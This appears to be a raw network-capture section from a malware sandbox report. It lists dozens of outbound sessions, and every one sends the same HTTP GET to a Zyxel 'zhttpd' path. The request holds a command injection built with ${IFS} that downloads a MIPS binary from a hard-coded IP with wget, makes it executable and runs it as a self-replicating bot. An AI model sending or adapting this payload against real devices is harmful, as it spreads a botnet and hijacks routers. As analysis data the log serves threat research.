                                                Jan 12, 2024 18:16:20.388736963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3749192.168.2.2342750188.234.161.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388777971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3750192.168.2.2340584221.98.81.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388819933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3751192.168.2.2337582170.13.178.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388859987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3752192.168.2.233406676.216.233.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388901949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3753192.168.2.234214669.227.158.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388957977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3754192.168.2.2349748126.234.5.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388957977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3755192.168.2.2352218179.111.174.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388981104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3756192.168.2.234057441.196.148.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389018059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3757192.168.2.234152850.136.240.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389070988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3758192.168.2.234362095.182.44.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389096975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3759192.168.2.2347020162.245.138.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389144897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3760192.168.2.2354894134.106.213.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389174938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3761192.168.2.2339802207.57.114.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389213085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3762192.168.2.236052248.221.173.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389252901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3763192.168.2.235337249.137.99.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389333963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3764192.168.2.234762493.163.218.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389339924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3765192.168.2.2354414166.73.217.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389374018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3766192.168.2.234427457.61.131.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389405012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3767192.168.2.235724089.194.213.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389461040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3768192.168.2.233859032.170.148.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389552116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3769192.168.2.234505465.182.241.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389617920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3770192.168.2.235571025.252.218.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389624119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3771192.168.2.234300838.232.104.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389624119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3772192.168.2.2351810157.38.222.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389656067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3773192.168.2.234280694.86.227.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389727116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3774192.168.2.2353850164.108.68.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389751911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3775192.168.2.2360364117.159.244.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389767885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3776192.168.2.2360892194.231.146.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389834881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3777192.168.2.2346130209.204.3.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389861107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3778192.168.2.234285491.97.206.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389916897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3779192.168.2.2345576188.96.64.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.389970064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3780192.168.2.2351286157.105.234.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390002012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3781192.168.2.2335736109.194.151.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390027046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3782192.168.2.2354464149.38.168.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390069962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3783192.168.2.23493765.27.13.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390116930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3784192.168.2.2343182106.139.46.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390146971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3785192.168.2.235258292.74.29.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390198946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3786192.168.2.2355508165.63.21.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390239954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3787192.168.2.2342780145.68.200.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390276909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3788192.168.2.2337874206.90.28.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390322924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3789192.168.2.235873818.132.167.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390352964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3790192.168.2.233293663.241.185.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390383959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3791192.168.2.2359154117.131.193.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390434027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3792192.168.2.233617424.214.133.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390469074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3793192.168.2.2344262132.231.229.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390516996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3794192.168.2.2354056136.42.157.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390552998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3795192.168.2.233909843.34.92.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390592098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3796192.168.2.2350856194.73.3.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390635967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3797192.168.2.234376638.152.40.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390671968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3798192.168.2.2339158146.28.3.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390713930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3799192.168.2.2355636120.107.109.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390747070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3800192.168.2.2343954203.245.153.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390786886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3801192.168.2.235844490.144.179.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390810966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3802192.168.2.235481035.193.84.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390872002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3803192.168.2.2333706169.49.88.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390908957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3804192.168.2.2336942129.249.37.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390966892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3805192.168.2.2353740100.30.25.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.390985012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3806192.168.2.235497068.100.6.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391038895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3807192.168.2.235039035.228.49.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391077995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3808192.168.2.2344246155.101.57.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391113043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3809192.168.2.2352028103.80.173.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391161919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3810192.168.2.233294852.163.112.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.391211033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3811192.168.2.2343528157.177.220.181443
                                                TimestampBytes transferredDirectionData
